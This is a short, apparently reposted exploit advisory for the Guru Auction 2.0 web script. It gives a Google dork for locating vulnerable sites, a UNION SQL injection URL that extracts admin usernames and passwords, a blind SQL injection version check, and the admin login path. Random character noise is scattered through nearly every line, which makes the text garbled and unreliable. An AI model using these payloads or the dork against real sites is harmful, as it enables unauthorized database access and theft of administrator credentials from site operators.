Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
9 e2 Y8 I0 v" P5 @5 [! ~1 u, [$ l7 K9 D5 q- X# Z2 W
作者 : v3n0m, S: G2 ?: o+ b1 N
应用 : Guru Auction 2.0
0 e0 F ~. @, j) |Price : $49
" t: _, C! ~3 y( m- L* bVendor : http://www.guruscript.com/
& H; T! X0 l" e: U: p- CGoogle Dork : inurl:subcat.php?cate_id=% Y8 ^9 d+ S0 c) ^& p- h( n( n+ r; N
! N8 W5 _6 _+ h6 Q, a) r# HSQLi p0c:0 b, g! f, n% ?! N
~~~~~~~~~~: h% S4 O* D3 w0 p
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
& n* E% n9 m5 o3 s% o5 p
$ f$ S9 R" H }7 }6 ~+ c
/ _# W7 Q) T$ V' B2 Y盲注 p0c:6 P6 `9 k% p. w+ a, {7 {7 o
~~~~~~~~~~
1 ?+ b* C0 e5 F: y2 ihttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true. X7 b, C& E# b) l$ p
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
, C( q! V4 c6 s6 |, b9 b) ]/ v) P
8 D& }0 k; t, W% C0 S管理登录入口:. T+ w9 {$ D0 q( |/ ~
~~~~~~~~~~
( o7 A' o) A+ G+ thttp://domain.tld/[path]/admin/6 a1 L: I8 n+ U$ k
|